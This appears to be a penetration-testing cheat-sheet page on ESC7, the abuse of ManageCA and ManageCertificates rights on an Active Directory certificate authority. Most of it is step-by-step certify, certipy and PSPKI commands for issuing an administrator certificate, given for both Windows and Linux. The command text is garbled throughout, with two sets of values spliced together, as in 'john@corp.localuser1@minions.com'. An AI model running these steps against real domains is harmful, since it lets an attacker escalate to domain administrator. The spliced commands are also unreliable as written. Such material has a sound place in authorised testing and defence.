Skip to main content

ESC7

Vulnerable Certificate Authority Access Control where 2 sets of permissions poses security risks:

  • ManageCA (or ManageCertificates)
  • ManageCertificates (or Certificate Manager)

Enumerate using certsrv.msc

PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.localminions.com | Get-CertificationAuthorityAcl | select -expand Access

Query CA with certutil (EditFlags value)

Check if EDITF_ATTRIBUTESUBJECTALTNAME2 is set if the value is 1376590.

PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA"minions.com\CA-minions" -getreg "policy\EditFlags"

Enumerate using PSPKI module

PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.localminions.com | Get-CertificationAuthorityAcl | select -ExpandProperty access

Windows

Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2)

Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI by toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (just like with ESC6). This allows SAN specification in any template. The ESC6 attack got patch on May of 2022, so Attack #2 might be a better alternative if it's the case.

Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA users have but they can't do it remotely.

  1. Request Certificate Template
PS /home/bobbuilder> .\certify.exe request /ca:<caca_name> /template:ApprovalNeeded
  1. Import PSPKI module
PS /home/bobbuilder> Import-Module PSPKI
  1. Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.localminions.com | Get-PendingRequest -RequestID 3361 | Approve-CertificateRequest
  1. Download Pending Request
PS /home/bobbuilder> .\certify.exe download /ca:<caca_name> /id:3361
Post Attack

Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell

PS /home/bobbuilder> $ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
PS /home/bobbuilder> $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")

Attack 2 (gain ManageCertificates right using ManageCA)

For this attack we only need ManageCA permission. We will need Manage Certificates permission and SubCA Certificate template enabled but they both can be enabled from ManageCA

  1. Grant Manage Certificates access (Optional, if we don't already)
certipyPS /home/bobbuilder> .\certipy.exe ca -ca 'corp-DC-CA'<ca_name>' -add-officer johnuser1 -username john@corp.localuser1@minions.com -password Passw0rdpassword1
  1. Enable SubCA Certificate template (Optional, The SubCA template is enabled by default)
certipyPS /home/bobbuilder> .\certipy.exe ca -username john@corp.localuser1@minions.com -password Passw0rd!password1 -target-ip ca.corp.local<ip> -ca 'corp-CA'<ca_name>' -enable-template 'SubCA'
  1. Request certificate based on the SubCA template
certipyPS /home/bobbuilder> .\certipy.exe req -username john@corp.localuser1@minions.com -password Passw0rdpassword1 -ca corp-DC-CA<ca_name> -target ca.corp.local<ip> -template SubCA -upn administrator@corp.localadministrator@minions.com
  1. Issue the failed certificate
certipyPS /home/bobbuilder> .\certipy.exe ca -ca 'corp-DC-CA'<ca_name>' -issue-request 7851 -username john@corp.localuser1@minions.com -password Passw0rdpassword1
  1. Retrieve the issued certificate
certipyPS /home/bobbuilder> .\certipy.exe req -username john@corp.localuser1@minions.com -password Passw0rdpassword1 -ca corp-DC-CA<ca_name> -target ca.corp.local<ip> -retrieve 7851

Linux

Attack 1 (ManageCA rights)

  1. Add Manage Certificates Access rights to BlWasp
bob$ certipy ca -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -add-officer BlWaspuser1
  1. Requesting a certificate with SAN (Enrollee Supplies Subject : True)
bob$ certipy req -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -template SubCA -upn Administrator
  1. Issue the certificate
bob$ certipy ca -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -issue-request 311
  1. Retrieve the certificate with the ID to authenticate using it
bob$ certipy req -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -retrieve 311

Attack 2 (ManageCertificates rights)

  1. Request a certificate with the manager's approval
bob$ certipy req -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -template ESC7_1<template> -upn Administrator
  1. Approve pending request
bob$ certipy ca -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -issue-request 591

  1. Retrieve approved request
bob$ certipy req -u 'BlWasp@lab.local'user1@minions.com' -p 'Password123!'password1' -ca lab-LAB-DC-CA<ca_name> -retrieve 591